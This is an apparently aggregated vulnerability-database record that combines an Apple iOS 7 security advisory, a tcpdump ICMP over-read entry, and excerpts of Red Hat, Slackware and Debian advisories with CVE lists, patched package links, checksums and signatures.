Description: An out of bounds array access existed in the
IOSerialFamily driver. This issue was addressed through additional
bounds checking.
CVE-ID
CVE-2013-5139 : @dent1zt
IPSec
Available for: iPhone 4 and later,
iPod touch (5th generation) and later, iPad 2 and later
Impact: An attacker may intercept data protected with IPSec Hybrid
Auth
Description: The DNS name of an IPSec Hybrid Auth server was not
being matched against the certificate, allowing an attacker with a
certificate for any server to impersonate any other. This issue was
addressed by improved certificate checking.
CVE-ID
CVE-2013-1028 : Alexander Traud of www.traud.de
Kernel
Available for: iPhone 4 and later,
iPod touch (5th generation) and later, iPad 2 and later
Impact: A remote attacker can cause a device to unexpectedly restart
Description: Sending an invalid packet fragment to a device can
cause a kernel assert to trigger, leading to a device restart. The
issue was addressed through additional validation of packet
fragments.
CVE-ID
CVE-2013-5140 : Joonas Kuorilehto of Codenomicon, an anonymous
researcher working with CERT-FI, Antti LevomAki and Lauri Virtanen
of Vulnerability Analysis Group, Stonesoft
Kernel
Available for: iPhone 4 and later,
iPod touch (5th generation) and later, iPad 2 and later
Impact: A malicious local application could cause device hang
Description: An integer truncation vulnerability in the kernel
socket interface could be leveraged to force the CPU into an infinite
loop. The issue was addressed by using a larger sized variable.
CVE-ID
CVE-2013-5141 : CESG
Kernel
Available for: iPhone 4 and later,
iPod touch (5th generation) and later, iPad 2 and later
Impact: An attacker on a local network can cause a denial of service
Description: An attacker on a local network can send specially
crafted IPv6 ICMP packets and cause high CPU load. The issue was
addressed by rate limiting ICMP packets before verifying their
checksum.
CVE-ID
CVE-2011-2391 : Marc Heuse
Kernel
Available for: iPhone 4 and later,
iPod touch (5th generation) and later, iPad 2 and later
Impact: Kernel stack memory may be disclosed to local users
Description: An information disclosure issue existed in the msgctl
and segctl APIs. This issue was addressed by initializing data
structures returned from the kernel.
CVE-ID
CVE-2013-5142 : Kenzley Alphonse of Kenx Technology, Inc
Kernel
Available for: iPhone 4 and later,
iPod touch (5th generation) and later, iPad 2 and later
Impact: Unprivileged processes could get access to the contents of
kernel memory which could lead to privilege escalation
Description: An information disclosure issue existed in the
mach_port_space_info API. This issue was addressed by initializing
the iin_collision field in structures returned from the kernel.
CVE-ID
CVE-2013-3953 : Stefan Esser
Kernel
Available for: iPhone 4 and later,
iPod touch (5th generation) and later, iPad 2 and later
Impact: Unprivileged processes may be able to cause an unexpected
system termination or arbitrary code execution in the kernel
Description: A memory corruption issue existed in the handling of
arguments to the posix_spawn API. This issue was addressed through
additional bounds checking.
CVE-ID
CVE-2013-3954 : Stefan Esser
Kext Management
Available for: iPhone 4 and later,
iPod touch (5th generation) and later, iPad 2 and later
Impact: An unauthorized process may modify the set of loaded kernel
extensions
Description: An issue existed in kextd's handling of IPC messages
from unauthenticated senders. This issue was addressed by adding
additional authorization checks.
CVE-ID
CVE-2013-5145 : "Rainbow PRISM"
libxml
Available for: iPhone 4 and later,
iPod touch (5th generation) and later, iPad 2 and later
Impact: Viewing a maliciously crafted web page may lead to an
unexpected application termination or arbitrary code execution
Description: Multiple memory corruption issues existed in libxml.
These issues were addressed by updating libxml to version 2.9.0.
CVE-ID
CVE-2011-3102 : Juri Aedla
CVE-2012-0841
CVE-2012-2807 : Juri Aedla
CVE-2012-5134 : Google Chrome Security Team (Juri Aedla)
libxslt
Available for: iPhone 4 and later,
iPod touch (5th generation) and later, iPad 2 and later
Impact: Viewing a maliciously crafted web page may lead to an
unexpected application termination or arbitrary code execution
Description: Multiple memory corruption issues existed in libxslt.
These issues were addressed by updating libxslt to version 1.1.28.
CVE-ID
CVE-2012-2825 : Nicolas Gregoire
CVE-2012-2870 : Nicolas Gregoire
CVE-2012-2871 : Kai Lu of Fortinet's FortiGuard Labs, Nicolas
Gregoire
Passcode Lock
Available for: iPhone 4 and later,
iPod touch (5th generation) and later, iPad 2 and later
Impact: A person with physical access to the device may be able to
bypass the screen lock
Description: A race condition issue existed in the handling of phone
calls and SIM card ejection at the lock screen. This issue was
addressed through improved lock state management.
CVE-ID
CVE-2013-5147 : videosdebarraquito
Personal Hotspot
Available for: iPhone 4 and later,
iPod touch (5th generation) and later, iPad 2 and later
Impact: An attacker may be able to join a Personal Hotspot network
Description: An issue existed in the generation of Personal Hotspot
passwords, resulting in passwords that could be predicted by an
attacker to join a user's Personal Hotspot. The issue was addressed
by generating passwords with higher entropy.
CVE-ID
CVE-2013-4616 : Andreas Kurtz of NESO Security Labs and Daniel Metz
of University Erlangen-Nuremberg
Push Notifications
Available for: iPhone 4 and later,
iPod touch (5th generation) and later, iPad 2 and later
Impact: The push notification token may be disclosed to an app
contrary to the user's decision
Description: An information disclosure issue existed in push
notification registration. Apps requesting access to the push
notification access received the token before the user approved the
app's use of push notifications. This issue was addressed by
withholding access to the token until the user has approved access.
CVE-ID
CVE-2013-5149 : Jack Flintermann of Grouper, Inc.
Safari
Available for: iPhone 4 and later,
iPod touch (5th generation) and later, iPad 2 and later
Impact: Visiting a maliciously crafted website may lead to an
unexpected application termination or arbitrary code execution
Description: A memory corruption issue existed in the handling of
XML files. This issue was addressed through additional bounds
checking.
CVE-ID
CVE-2013-1036 : Kai Lu of Fortinet's FortiGuard Labs
Safari
Available for: iPhone 4 and later,
iPod touch (5th generation) and later, iPad 2 and later
Impact: History of pages recently visited in an open tab may remain
after clearing of history
Description: Clearing Safari's history did not clear the
back/forward history for open tabs. This issue was addressed by
clearing the back/forward history.
CVE-ID
CVE-2013-5150
Safari
Available for: iPhone 4 and later,
iPod touch (5th generation) and later, iPad 2 and later
Impact: Viewing files on a website may lead to script execution even
when the server sends a 'Content-Type: text/plain' header
Description: Mobile Safari sometimes treated files as HTML files
even when the server sent a 'Content-Type: text/plain' header. This
may lead to cross-site scripting on sites that allow users to upload
files. This issue was addressed through improved handling of files
when 'Content-Type: text/plain' is set.
CVE-ID
CVE-2013-5151 : Ben Toews of Github
Safari
Available for: iPhone 4 and later,
iPod touch (5th generation) and later, iPad 2 and later
Impact: Visiting a malicious website may allow an arbitrary URL to
be displayed
Description: A URL bar spoofing issue existed in Mobile Safari. This
issue was addressed through improved URL tracking.
CVE-ID
CVE-2013-5152 : Keita Haga of keitahaga.com, Lukasz Pilorz of RBS
Sandbox
Available for: iPhone 4 and later,
iPod touch (5th generation) and later, iPad 2 and later
Impact: Applications that are scripts were not sandboxed
Description: Third-party applications which used the #! syntax to
run a script were sandboxed based on the identity of the script
interpreter, not the script. The interpreter may not have a sandbox
defined, leading to the application being run unsandboxed. This issue
was addressed by creating the sandbox based on the identity of the
script.
CVE-ID
CVE-2013-5154 : evad3rs
Sandbox
Available for: iPhone 4 and later,
iPod touch (5th generation) and later, iPad 2 and later
Impact: Applications can cause a system hang
Description: Malicious third-party applications that wrote specific
values to the /dev/random device could force the CPU to enter an
infinite loop. This issue was addressed by preventing third-party
applications from writing to /dev/random.
CVE-ID
CVE-2013-5155 : CESG
Social
Available for: iPhone 4 and later,
iPod touch (5th generation) and later, iPad 2 and later
Impact: Users recent Twitter activity could be disclosed on devices
with no passcode.
Description: An issue existed where it was possible to determine
what Twitter accounts a user had recently interacted with. This issue
was resolved by restricting access to the Twitter icon cache.
CVE-ID
CVE-2013-5158 : Jonathan Zdziarski
Springboard
Available for: iPhone 4 and later,
iPod touch (5th generation) and later, iPad 2 and later
Impact: A person with physical access to a device in Lost Mode may
be able to view notifications
Description: An issue existed in the handling of notifications when
a device is in Lost Mode. This update addresses the issue with
improved lock state management.
CVE-ID
CVE-2013-5153 : Daniel Stangroom
Telephony
Available for: iPhone 4 and later,
iPod touch (5th generation) and later, iPad 2 and later
Impact: Malicious apps could interfere with or control telephony
functionality
Description: An access control issue existed in the telephony
subsystem. Bypassing supported APIs, sandboxed apps could make
requests directly to a system daemon interfering with or controlling
telephony functionality. This issue was addressed by enforcing access
controls on interfaces exposed by the telephony daemon.
CVE-ID
CVE-2013-5156 : Jin Han of the Institute for Infocomm Research
working with Qiang Yan and Su Mon Kywe of Singapore Management
University; Tielei Wang, Kangjie Lu, Long Lu, Simon Chung, and Wenke
Lee from the Georgia Institute of Technology
Twitter
Available for: iPhone 4 and later,
iPod touch (5th generation) and later, iPad 2 and later
Impact: Sandboxed apps could send tweets without user interaction or
permission
Description: An access control issue existed in the Twitter
subsystem. Bypassing supported APIs, sandboxed apps could make
requests directly to a system daemon interfering with or controlling
Twitter functionality. This issue was addressed by enforcing access
controls on interfaces exposed by the Twitter daemon.
CVE-ID
CVE-2013-5157 : Jin Han of the Institute for Infocomm Research
working with Qiang Yan and Su Mon Kywe of Singapore Management
University; Tielei Wang, Kangjie Lu, Long Lu, Simon Chung, and Wenke
Lee from the Georgia Institute of Technology
WebKit
Available for: iPhone 4 and later,
iPod touch (5th generation) and later, iPad 2 and later
Impact: Visiting a maliciously crafted website may lead to an
unexpected application termination or arbitrary code execution
Description: Multiple memory corruption issues existed in WebKit.
These issues were addressed through improved memory handling.
CVE-ID
CVE-2013-0879 : Atte Kettunen of OUSPG
CVE-2013-0991 : Jay Civelli of the Chromium development community
CVE-2013-0992 : Google Chrome Security Team (Martin Barbella)
CVE-2013-0993 : Google Chrome Security Team (Inferno)
CVE-2013-0994 : David German of Google
CVE-2013-0995 : Google Chrome Security Team (Inferno)
CVE-2013-0996 : Google Chrome Security Team (Inferno)
CVE-2013-0997 : Vitaliy Toropov working with HP's Zero Day Initiative
CVE-2013-0998 : pa_kt working with HP's Zero Day Initiative
CVE-2013-0999 : pa_kt working with HP's Zero Day Initiative
CVE-2013-1000 : Fermin J. Serna of the Google Security Team
CVE-2013-1001 : Ryan Humenick
CVE-2013-1002 : Sergey Glazunov
CVE-2013-1003 : Google Chrome Security Team (Inferno)
CVE-2013-1004 : Google Chrome Security Team (Martin Barbella)
CVE-2013-1005 : Google Chrome Security Team (Martin Barbella)
CVE-2013-1006 : Google Chrome Security Team (Martin Barbella)
CVE-2013-1007 : Google Chrome Security Team (Inferno)
CVE-2013-1008 : Sergey Glazunov
CVE-2013-1010 : miaubiz
CVE-2013-1037 : Google Chrome Security Team
CVE-2013-1038 : Google Chrome Security Team
CVE-2013-1039 : own-hero Research working with iDefense VCP
CVE-2013-1040 : Google Chrome Security Team
CVE-2013-1041 : Google Chrome Security Team
CVE-2013-1042 : Google Chrome Security Team
CVE-2013-1043 : Google Chrome Security Team
CVE-2013-1044 : Apple
CVE-2013-1045 : Google Chrome Security Team
CVE-2013-1046 : Google Chrome Security Team
CVE-2013-1047 : miaubiz
CVE-2013-2842 : Cyril Cattiaux
CVE-2013-5125 : Google Chrome Security Team
CVE-2013-5126 : Apple
CVE-2013-5127 : Google Chrome Security Team
CVE-2013-5128 : Apple
WebKit
Available for: iPhone 4 and later,
iPod touch (5th generation) and later, iPad 2 and later
Impact: Visiting a malicious website may lead to information
disclosure
Description: An information disclosure issue existed in the handling
of the window.webkitRequestAnimationFrame() API. A maliciously
crafted website could use an iframe to determine if another site used
window.webkitRequestAnimationFrame(). This issue was addressed
through improved handling of window.webkitRequestAnimationFrame().
CVE-ID
CVE-2013-5159
WebKit
Available for: iPhone 4 and later,
iPod touch (5th generation) and later, iPad 2 and later
Impact: Copying and pasting a malicious HTML snippet may lead to a
cross-site scripting attack
Description: A cross-site scripting issue existed in the handling of
copied and pasted data in HTML documents. This issue was addressed
through additional validation of pasted content.
CVE-ID
CVE-2013-0926 : Aditya Gupta, Subho Halder, and Dev Kar of xys3c
(xysec.com)
WebKit
Available for: iPhone 4 and later,
iPod touch (5th generation) and later, iPad 2 and later
Impact: Visiting a maliciously crafted website may lead to a cross-
site scripting attack
Description: A cross-site scripting issue existed in the handling of
iframes. This issue was addressed through improved origin tracking.
CVE-ID
CVE-2013-1012 : Subodh Iyengar and Erling Ellingsen of Facebook
WebKit
Available for: iPhone 3GS and later,
iPod touch (4th generation) and later, iPad 2 and later
Impact: Visiting a maliciously crafted website may lead to an
information disclosure
Description: An information disclosure issue existed in XSSAuditor.
This issue was addressed through improved handling of URLs.
CVE-ID
CVE-2013-2848 : Egor Homakov
WebKit
Available for: iPhone 4 and later,
iPod touch (5th generation) and later, iPad 2 and later
Impact: Dragging or pasting a selection may lead to a cross-site
scripting attack
Description: Dragging or pasting a selection from one site to
another may allow scripts contained in the selection to be executed
in the context of the new site. This issue is addressed through
additional validation of content before a paste or a drag and drop
operation.
CVE-ID
CVE-2013-5129 : Mario Heiderich
WebKit
Available for: iPhone 4 and later,
iPod touch (5th generation) and later, iPad 2 and later
Impact: Visiting a maliciously crafted website may lead to a cross-
site scripting attack
Description: A cross-site scripting issue existed in the handling of
URLs. This issue was addressed through improved origin tracking.
CVE-ID
CVE-2013-5131 : Erling A Ellingsen
Installation note:
This update is available through iTunes and Software Update on your
iOS device, and will not appear in your computer's Software Update
application, or in the Apple Downloads site. Make sure you have an
Internet connection and have installed the latest version of iTunes
from www.apple.com/itunes/
iTunes and Software Update on the device will automatically check
Apple's update server on its weekly schedule. When an update is
detected, it is downloaded and the option to be installed is
presented to the user when the iOS device is docked. We recommend
applying the update immediately if possible. Selecting Don't Install
will present the option the next time you connect your iOS device.
The automatic update process may take up to a week depending on the
day that iTunes or the device checks for updates. You may manually
obtain the update via the Check for Updates button within iTunes, or
the Software Update on your device.
To check that the iPhone, iPod touch, or iPad has been updated:
* Navigate to Settings
* Select General
* Select About. The version after applying this update
will be "7.0".
Information will also be posted to the Apple Security Updates
web site: http://support.apple.com/kb/HT1222
This message is signed with Apple's Product Security PGP key,
and details are available at:
https://www.apple.com/support/security/pgp/
-----BEGIN PGP SIGNATURE-----
Version: GnuPG/MacGPG2 v2.0.17 (Darwin)
Comment: GPGTools - http://gpgtools.org
iQIcBAEBAgAGBQJSOe4/AAoJEPefwLHPlZEwToUP/jUGETRBdUjwN/gMmQAtl6zN
0VUMbnsNH51Lhsr15p9EHYJUL97pajT0N1gdd8Q2l+2NHkQzQLJziXgsO6VFOX7e
GoLNvlbyfoE0Ac9dSm9w7yi2lVf8bjGZKmEH0DAXzZD5s0ThiqPZCjTo8rCODMH2
TyQgkYtcXtrAHYaFe0dceWe3Q0ORu24cuFg0xeqX+7QvzK9mSeJWiN8OtimMzDni
5Dvgn7emHiuI6f3huQ25bEXK4gjN+CGwXg2RhQ7fwm9IeBdLnH1qKrFrrMHIhbrK
ibvud5jLS0ltUH+XnfBkoCkBntOO11vYllti8oIGCgaa5NkVkEOKbHy9uh6riGHT
KXYU/LfM8tt8Ax6iknn4mYC2QYbv7OIyzSfu/scWbeawsJb4OMx71oJrROTArgQG
QthFQvFk7NSe5kQlNz+xQHI5LP/ZSHTKdwT69zPIzjWQBOdcZ+4GQvmMsbKIeZeY
I2oIull2C7XYav8B0o+l4WlyEewNCOHQ8znapZnjCRKT/FF/ueG/WO0J4SEWUbQz
Kf24sZtFtm51QekPS3vc1XHacqJLELD8ugtgYC3hh9vUqkLV3UxpLKvI8uoOPUDt
SCV3qSpaxgBQtJWUZPq0MWVTDJKzX4MEB8e1p4jZAggEzfx9AdT0s7XyGm9H/UsR
GowSVGG+cJtvrngVhy3E
=dNVy
-----END PGP SIGNATURE-----
|
|
var-201910-1495
|
The ICMP parser in tcpdump before 4.9.3 has a buffer over-read in print-icmp.c:icmp_print(). tcpdump Contains an out-of-bounds vulnerability.Information is obtained, information is altered, and service operation is disrupted (DoS) There is a possibility of being put into a state. tcpdump is a set of sniffing tools run under the command line by the Tcpdump team. In addition to persistent storage, Red Hat
OpenShift Container Storage provisions a multicloud data management service
with an S3 compatible API.
These updated images include numerous security fixes, bug fixes, and
enhancements. Solution:
Before applying this update, make sure all previously released errata
relevant to your system have been applied. Bugs fixed (https://bugzilla.redhat.com/):
1806266 - Require an extension to the cephfs subvolume commands, that can return metadata regarding a subvolume
1813506 - Dockerfile not compatible with docker and buildah
1817438 - OSDs not distributed uniformly across OCS nodes on a 9-node AWS IPI setup
1817850 - [BAREMETAL] rook-ceph-operator does not reconcile when osd deployment is deleted when performed node replacement
1827157 - OSD hitting default CPU limit on AWS i3en.2xlarge instances limiting performance
1829055 - [RFE] add insecureEdgeTerminationPolicy: Redirect to noobaa mgmt route (http to https)
1833153 - add a variable for sleep time of rook operator between checks of downed OSD+Node.
1836299 - NooBaa Operator deploys with HPA that fires maxreplicas alerts by default
1842254 - [NooBaa] Compression stats do not add up when compression id disabled
1845976 - OCS 4.5 Independent mode: must-gather commands fails to collect ceph command outputs from external cluster
1849771 - [RFE] Account created by OBC should have same permissions as bucket owner
1853652 - CVE-2020-14040 golang.org/x/text: possibility to trigger an infinite loop in encoding/unicode could lead to crash
1854500 - [tracker-rhcs bug 1838931] mgr/volumes: add command to return metadata of a subvolume snapshot
1854501 - [Tracker-rhcs bug 1848494 ]pybind/mgr/volumes: Add the ability to keep snapshots of subvolumes independent of the source subvolume
1854503 - [tracker-rhcs-bug 1848503] cephfs: Provide alternatives to increase the total cephfs subvolume snapshot counts to greater than the current 400 across a Cephfs volume
1856953 - CVE-2020-15586 golang: data race in certain net/http servers including ReverseProxy can lead to DoS
1858195 - [GSS] registry pod stuck in ContainerCreating due to pvc from cephfs storage class fail to mount
1859183 - PV expansion is failing in retry loop in pre-existing PV after upgrade to OCS 4.5 (i.e. if the PV spec does not contain expansion params)
1859229 - Rook should delete extra MON PVCs in case first reconcile takes too long and rook skips "b" and "c" (spawned from Bug 1840084#c14)
1859478 - OCS 4.6 : Upon deployment, CSI Pods in CLBO with error - flag provided but not defined: -metadatastorage
1860022 - OCS 4.6 Deployment: LBP CSV and pod should not be deployed since ob/obc CRDs are owned from OCS 4.5 onwards
1860034 - OCS 4.6 Deployment in ocs-ci : Toolbox pod in ContainerCreationError due to key admin-secret not found
1860670 - OCS 4.5 Uninstall External: Openshift-storage namespace in Terminating state as CephObjectStoreUser had finalizers remaining
1860848 - Add validation for rgw-pool-prefix in the ceph-external-cluster-details-exporter script
1861780 - [Tracker BZ1866386][IBM s390x] Mount Failed for CEPH while running couple of OCS test cases.
Here are the details from the Slackware 14.2 ChangeLog:
+--------------------------+
patches/packages/libpcap-1.9.1-i586-1_slack14.2.txz: Upgraded.
patches/packages/tcpdump-4.9.3-i586-1_slack14.2.txz: Upgraded.
Fix buffer overflow/overread vulnerabilities and command line
argument/local issues.
For more information, see:
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-16808
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-14468
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-14469
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-14470
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-14466
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-14461
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-14462
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-14465
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-14881
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-14464
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-14463
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-14467
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-10103
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-10105
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-14880
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-16451
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-14882
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-16227
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-16229
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-16301
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-16230
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-16452
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-16300
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-16228
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-15166
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-15167
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-14879
(* Security fix *)
+--------------------------+
Where to find the new packages:
+-----------------------------+
Thanks to the friendly folks at the OSU Open Source Lab
(http://osuosl.org) for donating FTP and rsync hosting
to the Slackware project! :-)
Also see the "Get Slack" section on http://slackware.com for
additional mirror sites near you.
Updated packages for Slackware 14.0:
ftp://ftp.slackware.com/pub/slackware/slackware-14.0/patches/packages/libpcap-1.9.1-i486-1_slack14.0.txz
ftp://ftp.slackware.com/pub/slackware/slackware-14.0/patches/packages/tcpdump-4.9.3-i486-1_slack14.0.txz
Updated packages for Slackware x86_64 14.0:
ftp://ftp.slackware.com/pub/slackware/slackware64-14.0/patches/packages/libpcap-1.9.1-x86_64-1_slack14.0.txz
ftp://ftp.slackware.com/pub/slackware/slackware64-14.0/patches/packages/tcpdump-4.9.3-x86_64-1_slack14.0.txz
Updated packages for Slackware 14.1:
ftp://ftp.slackware.com/pub/slackware/slackware-14.1/patches/packages/libpcap-1.9.1-i486-1_slack14.1.txz
ftp://ftp.slackware.com/pub/slackware/slackware-14.1/patches/packages/tcpdump-4.9.3-i486-1_slack14.1.txz
Updated packages for Slackware x86_64 14.1:
ftp://ftp.slackware.com/pub/slackware/slackware64-14.1/patches/packages/libpcap-1.9.1-x86_64-1_slack14.1.txz
ftp://ftp.slackware.com/pub/slackware/slackware64-14.1/patches/packages/tcpdump-4.9.3-x86_64-1_slack14.1.txz
Updated packages for Slackware 14.2:
ftp://ftp.slackware.com/pub/slackware/slackware-14.2/patches/packages/libpcap-1.9.1-i586-1_slack14.2.txz
ftp://ftp.slackware.com/pub/slackware/slackware-14.2/patches/packages/tcpdump-4.9.3-i586-1_slack14.2.txz
Updated packages for Slackware x86_64 14.2:
ftp://ftp.slackware.com/pub/slackware/slackware64-14.2/patches/packages/libpcap-1.9.1-x86_64-1_slack14.2.txz
ftp://ftp.slackware.com/pub/slackware/slackware64-14.2/patches/packages/tcpdump-4.9.3-x86_64-1_slack14.2.txz
Updated packages for Slackware -current:
ftp://ftp.slackware.com/pub/slackware/slackware-current/slackware/l/libpcap-1.9.0-i586-1.txz
ftp://ftp.slackware.com/pub/slackware/slackware-current/slackware/n/tcpdump-4.9.2-i586-3.txz
Updated packages for Slackware x86_64 -current:
ftp://ftp.slackware.com/pub/slackware/slackware64-current/slackware64/l/libpcap-1.9.1-x86_64-1.txz
ftp://ftp.slackware.com/pub/slackware/slackware64-current/slackware64/n/tcpdump-4.9.3-x86_64-1.txz
MD5 signatures:
+-------------+
Slackware 14.0 packages:
0855bcc24c0d39f6ec3c6fa7d956ebf4 libpcap-1.9.1-i486-1_slack14.0.txz
1c53d8ea7923c5947dbbf0eb2dfca2aa tcpdump-4.9.3-i486-1_slack14.0.txz
Slackware x86_64 14.0 packages:
080435560c6498ba82e3131d9d7f36e4 libpcap-1.9.1-x86_64-1_slack14.0.txz
3740823881e104943cb15be6870a0e7d tcpdump-4.9.3-x86_64-1_slack14.0.txz
Slackware 14.1 packages:
7f1dffd77993897a3729c1fb3ea5e395 libpcap-1.9.1-i486-1_slack14.1.txz
b267563e154bbddab251e8e2c7a11f69 tcpdump-4.9.3-i486-1_slack14.1.txz
Slackware x86_64 14.1 packages:
1177a6f007a4924c2116d15f8cb92900 libpcap-1.9.1-x86_64-1_slack14.1.txz
de9844ab61993927903a91fc05450c8c tcpdump-4.9.3-x86_64-1_slack14.1.txz
Slackware 14.2 packages:
2672c9a84590170ff8f7f2b233af9a38 libpcap-1.9.1-i586-1_slack14.2.txz
578dbf94aa192915243e2d200c557cc5 tcpdump-4.9.3-i586-1_slack14.2.txz
Slackware x86_64 14.2 packages:
16f70962eebe606d3d9668202752bc51 libpcap-1.9.1-x86_64-1_slack14.2.txz
0a4b8400d30a84bc1df774b3537cb4b5 tcpdump-4.9.3-x86_64-1_slack14.2.txz
Slackware -current packages:
8765839c82fc67a8075b9e1c5211776b l/libpcap-1.9.0-i586-1.txz
9de3c38d7c061534d28b5b599ab5d563 n/tcpdump-4.9.2-i586-3.txz
Slackware x86_64 -current packages:
cb278799afec0d6e99ce9a126b9e65f3 l/libpcap-1.9.1-x86_64-1.txz
2d14083ccadb447e5af06e0f940fefa5 n/tcpdump-4.9.3-x86_64-1.txz
Installation instructions:
+------------------------+
Upgrade the packages as root:
# upgradepkg libpcap-1.9.1-i586-1_slack14.2.txz tcpdump-4.9.3-i586-1_slack14.2.txz
+-----+
Slackware Linux Security Team
http://slackware.com/gpg-key
security@slackware.com
+------------------------------------------------------------------------+
| To leave the slackware-security mailing list: |
+------------------------------------------------------------------------+
| Send an email to majordomo@slackware.com with this text in the body of |
| the email message: |
| |
| unsubscribe slackware-security |
| |
| You will get a confirmation message back containing instructions to |
| complete the process. Please do not reply to this email address.
For the oldstable distribution (stretch), these problems have been fixed
in version 4.9.3-1~deb9u1.
For the stable distribution (buster), these problems have been fixed in
version 4.9.3-1~deb10u1.
For the detailed security status of tcpdump please refer to
its security tracker page at:
https://security-tracker.debian.org/tracker/tcpdump
Further information about Debian Security Advisories, how to apply
these updates to your system and frequently asked questions can be
found at: https://www.debian.org/security/
Mailing list: debian-security-announce@lists.debian.org
-----BEGIN PGP SIGNATURE-----
iQIzBAEBCgAdFiEEtuYvPRKsOElcDakFEMKTtsN8TjYFAl2uIaAACgkQEMKTtsN8
Tjb5ZA/9FxAE0uHVnbXapPaDdrf4JOElV9+iZho4b87YuSXZKch7y/xUtlHMx6Jy
9iYzUd2Cwg0OPRyZii3PjiGSxSrKW9xTYnyfPzI7WdPFWRbeVLw9PKUV9R18fE2u
svIuKdeHiJd/MabagWqPffn4ZxgfxlG2Px3xtQhnFchDb7yXAsRUIdWwjIyw1fXR
/lRkaehvKkwBHLYtSTnNnMrZyRYNsZBZ6WSeZ5hIFugq9wwWTYXY3vJxR2IUqhq8
veQrHg8DVt58G+GhI7EdmEKB9vJrjtNZBlz8VCiGESxSw/BZjCw2vl20gL2JmV0f
1OA4NaMH7l6Sj2DQDCqHIDN++PGhLkQWUxJHrLV2aqfZ7kn9bxXpX3djUYYjRzpS
yaHsAsFOp7zwXkebbvV0dFhjLtst39xRJAEr8dAw6DUmfZqIPazdLv+PGGDpEuuq
pcAe6QqrNettT37VCx81PtIQL4BJf1lvTW6VHIwj0MaQ6aFdNImzw/n1ld26ktoV
feHER0IM0saIgwj/STOLV1+elNzi9dGdaFArxMRvM/s3fwo8JiYv1qnzfqGtQ6xH
5QwoBwwMZEEkqBvDCTtyFxLgg+Q/iVavwinxIRIb4Ttkr9M+PBL0WldFntlQRrlN
SZDCcsvfxjM9aOwNS+tMCoX3CKB7hj94u+ti8MRJCw9I9EOzmZE=
=bACv
-----END PGP SIGNATURE-----
. -----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA256
=====================================================================
Red Hat Security Advisory
Synopsis: Moderate: OpenShift Container Platform 4.7.0 security, bug fix, and enhancement update
Advisory ID: RHSA-2020:5633-01
Product: Red Hat OpenShift Enterprise
Advisory URL: https://access.redhat.com/errata/RHSA-2020:5633
Issue date: 2021-02-24
CVE Names: CVE-2018-10103 CVE-2018-10105 CVE-2018-14461
CVE-2018-14462 CVE-2018-14463 CVE-2018-14464
CVE-2018-14465 CVE-2018-14466 CVE-2018-14467
CVE-2018-14468 CVE-2018-14469 CVE-2018-14470
CVE-2018-14553 CVE-2018-14879 CVE-2018-14880
CVE-2018-14881 CVE-2018-14882 CVE-2018-16227
CVE-2018-16228 CVE-2018-16229 CVE-2018-16230
CVE-2018-16300 CVE-2018-16451 CVE-2018-16452
CVE-2018-20843 CVE-2019-3884 CVE-2019-5018
CVE-2019-6977 CVE-2019-6978 CVE-2019-8625
CVE-2019-8710 CVE-2019-8720 CVE-2019-8743
CVE-2019-8764 CVE-2019-8766 CVE-2019-8769
CVE-2019-8771 CVE-2019-8782 CVE-2019-8783
CVE-2019-8808 CVE-2019-8811 CVE-2019-8812
CVE-2019-8813 CVE-2019-8814 CVE-2019-8815
CVE-2019-8816 CVE-2019-8819 CVE-2019-8820
CVE-2019-8823 CVE-2019-8835 CVE-2019-8844
CVE-2019-8846 CVE-2019-9455 CVE-2019-9458
CVE-2019-11068 CVE-2019-12614 CVE-2019-13050
CVE-2019-13225 CVE-2019-13627 CVE-2019-14889
CVE-2019-15165 CVE-2019-15166 CVE-2019-15903
CVE-2019-15917 CVE-2019-15925 CVE-2019-16167
CVE-2019-16168 CVE-2019-16231 CVE-2019-16233
CVE-2019-16935 CVE-2019-17450 CVE-2019-17546
CVE-2019-18197 CVE-2019-18808 CVE-2019-18809
CVE-2019-19046 CVE-2019-19056 CVE-2019-19062
CVE-2019-19063 CVE-2019-19068 CVE-2019-19072
CVE-2019-19221 CVE-2019-19319 CVE-2019-19332
CVE-2019-19447 CVE-2019-19524 CVE-2019-19533
CVE-2019-19537 CVE-2019-19543 CVE-2019-19602
CVE-2019-19767 CVE-2019-19770 CVE-2019-19906
CVE-2019-19956 CVE-2019-20054 CVE-2019-20218
CVE-2019-20386 CVE-2019-20387 CVE-2019-20388
CVE-2019-20454 CVE-2019-20636 CVE-2019-20807
CVE-2019-20812 CVE-2019-20907 CVE-2019-20916
CVE-2020-0305 CVE-2020-0444 CVE-2020-1716
CVE-2020-1730 CVE-2020-1751 CVE-2020-1752
CVE-2020-1971 CVE-2020-2574 CVE-2020-2752
CVE-2020-2922 CVE-2020-3862 CVE-2020-3864
CVE-2020-3865 CVE-2020-3867 CVE-2020-3868
CVE-2020-3885 CVE-2020-3894 CVE-2020-3895
CVE-2020-3897 CVE-2020-3898 CVE-2020-3899
